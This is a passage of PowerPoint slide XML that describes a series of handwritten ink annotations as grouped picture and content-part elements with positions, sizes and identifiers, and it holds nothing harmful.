                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId53"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3934012" y="3926412"/>
                  <a:ext cx="33156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F323268A-1546-BA4A-1705-FED781479505}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3929332" y="3946572"/>
                <a:ext cx="72360" cy="429120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="30" name="Ink 29">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F323268A-1546-BA4A-1705-FED781479505}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId55"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3893692" y="3910932"/>
                  <a:ext cx="14400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41EEC3B2-3CC9-43C7-6F91-5A9D8C470A20}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4039852" y="4001292"/>
                <a:ext cx="391320" cy="420840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="31" name="Ink 30">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41EEC3B2-3CC9-43C7-6F91-5A9D8C470A20}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId57"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4003852" y="3965652"/>
                  <a:ext cx="46296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Ink 31">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFF57559-F337-0A44-A7B8-04ED41999C8C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4477612" y="4095252"/>
                <a:ext cx="47880" cy="203040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="32" name="Ink 31">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFF57559-F337-0A44-A7B8-04ED41999C8C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId59"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4441972" y="4059252"/>
                  <a:ext cx="1195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FC73FC2B-EA89-B4A2-17E2-E247B538D784}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4516852" y="4008132"/>
                <a:ext cx="228240" cy="297720"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="33" name="Ink 32">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC73FC2B-EA89-B4A2-17E2-E247B538D784}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId61"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4480852" y="3972132"/>
                  <a:ext cx="2998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99F3D92B-600E-698A-71AA-8C1C84AA926C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4914292" y="4040532"/>
                <a:ext cx="118800" cy="322920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="34" name="Ink 33">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99F3D92B-600E-698A-71AA-8C1C84AA926C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId63"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4878292" y="4004532"/>
                  <a:ext cx="19044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 34">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{678793C7-CE5C-2CD6-1007-0CDBFE8420D5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5017252" y="3977892"/>
                <a:ext cx="236160" cy="399960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="35" name="Ink 34">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{678793C7-CE5C-2CD6-1007-0CDBFE8420D5}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId65"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4981252" y="3941892"/>
                  <a:ext cx="30780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Ink 35">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B921ED6-3F02-2FC4-4CD6-8E904B669662}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4978012" y="4178772"/>
                <a:ext cx="295560" cy="25920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="36" name="Ink 35">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B921ED6-3F02-2FC4-4CD6-8E904B669662}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId67"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4942372" y="4142772"/>
                  <a:ext cx="3672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 name="Ink 36">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD8AE8E7-0BD8-2F37-6112-FC2693B47F87}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5290492" y="3985452"/>
                <a:ext cx="51120" cy="393120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="37" name="Ink 36">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD8AE8E7-0BD8-2F37-6112-FC2693B47F87}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId69"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5254852" y="3949812"/>
                  <a:ext cx="12276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8" name="Ink 37">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73234E3D-FBDF-7277-202E-4C5711A22E7A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5259532" y="3876372"/>
                <a:ext cx="165600" cy="250920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="38" name="Ink 37">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73234E3D-FBDF-7277-202E-4C5711A22E7A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId71"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5223892" y="3840372"/>
                  <a:ext cx="23724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 name="Ink 39">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4EC17E1-5EBA-25DC-D80F-E7C2B1D1D562}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2406892" y="513972"/>
                <a:ext cx="3666600" cy="4910400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="40" name="Ink 39">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4EC17E1-5EBA-25DC-D80F-E7C2B1D1D562}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId73"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2370892" y="478332"/>
                  <a:ext cx="3738240" cy="4982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BAC94060-0AA2-206C-F142-62D8B0C9D7C8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3782452" y="3594132"/>
                <a:ext cx="422640" cy="10080"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="42" name="Ink 41">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAC94060-0AA2-206C-F142-62D8B0C9D7C8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId75"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3746812" y="3558492"/>
                  <a:ext cx="4942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4217B64E-DFCC-9DA1-6782-FBB1F51268E1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4842292" y="578052"/>
                <a:ext cx="300240" cy="529200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="44" name="Ink 43">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4217B64E-DFCC-9DA1-6782-FBB1F51268E1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId77"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4806652" y="542412"/>
                  <a:ext cx="371880" cy="600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E7AA5C82-27EA-7B08-5C78-CE73A19A7538}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4672732" y="820332"/>
                <a:ext cx="290520" cy="549000"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="45" name="Ink 44">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7AA5C82-27EA-7B08-5C78-CE73A19A7538}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId79"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4637092" y="784692"/>
                  <a:ext cx="362160" cy="620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87FECB05-2432-2956-8120-3DFB5EB480B3}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5385892" y="327852"/>
                <a:ext cx="264600" cy="338760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="46" name="Ink 45">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87FECB05-2432-2956-8120-3DFB5EB480B3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId81"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5349892" y="291852"/>
                  <a:ext cx="3362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79C6FB8A-992B-6607-CFA7-4B450A04044B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5978452" y="468612"/>
                <a:ext cx="37800" cy="272880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="47" name="Ink 46">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79C6FB8A-992B-6607-CFA7-4B450A04044B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId83"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5942452" y="432612"/>
                  <a:ext cx="1094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F1017A64-E6BE-BE77-8B8F-330BFF65279C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6469132" y="3634092"/>
                <a:ext cx="237240" cy="474840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="49" name="Ink 48">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1017A64-E6BE-BE77-8B8F-330BFF65279C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId85"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6433132" y="3598092"/>
                  <a:ext cx="30888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EB82FEC3-179A-4FBF-4009-D96DEDC044FD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6720772" y="3867372"/>
                <a:ext cx="533160" cy="275400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="50" name="Ink 49">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB82FEC3-179A-4FBF-4009-D96DEDC044FD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId87"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6685132" y="3831372"/>
                  <a:ext cx="6048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B6A9E2F5-1CB9-A1B0-3445-FA85E676DA5C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5491732" y="3796812"/>
                <a:ext cx="495000" cy="33840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="55" name="Ink 54">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6A9E2F5-1CB9-A1B0-3445-FA85E676DA5C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId89"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5456092" y="3760812"/>
                  <a:ext cx="5666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5C56B972-9622-F500-0B61-B8ECE9849D2A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5469772" y="3555612"/>
                <a:ext cx="390960" cy="561600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="56" name="Ink 55">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C56B972-9622-F500-0B61-B8ECE9849D2A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId91"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5433772" y="3519972"/>
                  <a:ext cx="462600" cy="633240"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="71" name="Group 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{908865EC-21B8-C3CA-EDC4-EA436C1831C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4993492" y="1968372"/>
            <a:ext cx="501120" cy="478080"/>
            <a:chOff x="4993492" y="1968372"/>
            <a:chExt cx="501120" cy="478080"/>
          </a:xfrm>
        </p:grpSpPr>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BAE530F9-8283-8BEA-E880-ABA6DD20FB28}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4993492" y="2008332"/>
                <a:ext cx="129240" cy="264600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="58" name="Ink 57">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAE530F9-8283-8BEA-E880-ABA6DD20FB28}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId93"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4957852" y="1972332"/>
                  <a:ext cx="20088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03E5E0B4-F2DD-BC1C-C9E5-52F80F6DEC39}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5212372" y="2024172"/>
                <a:ext cx="172080" cy="422280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="59" name="Ink 58">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03E5E0B4-F2DD-BC1C-C9E5-52F80F6DEC39}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId95"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5176732" y="1988172"/>
                  <a:ext cx="24372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EDB60C14-A28E-DADD-1F1C-0FE24491943F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5345572" y="1968372"/>
                <a:ext cx="149040" cy="182880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="60" name="Ink 59">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDB60C14-A28E-DADD-1F1C-0FE24491943F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId97"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5309572" y="1932732"/>
                  <a:ext cx="220680" cy="254520"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="70" name="Group 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B214229C-F394-C45E-8064-D3E380FA2D66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8901652" y="2008332"/>
            <a:ext cx="548640" cy="844560"/>
            <a:chOff x="8901652" y="2008332"/>
            <a:chExt cx="548640" cy="844560"/>
          </a:xfrm>
        </p:grpSpPr>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FF1B567F-15DC-AD9F-FA53-5ECE18E64C74}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8940532" y="2305332"/>
                <a:ext cx="54720" cy="180360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="61" name="Ink 60">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF1B567F-15DC-AD9F-FA53-5ECE18E64C74}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId99"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8904892" y="2269692"/>
                  <a:ext cx="126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FEBA2F84-ABFE-811E-2EF2-5E7B214C21B9}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8901652" y="2008332"/>
                <a:ext cx="360" cy="9720"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
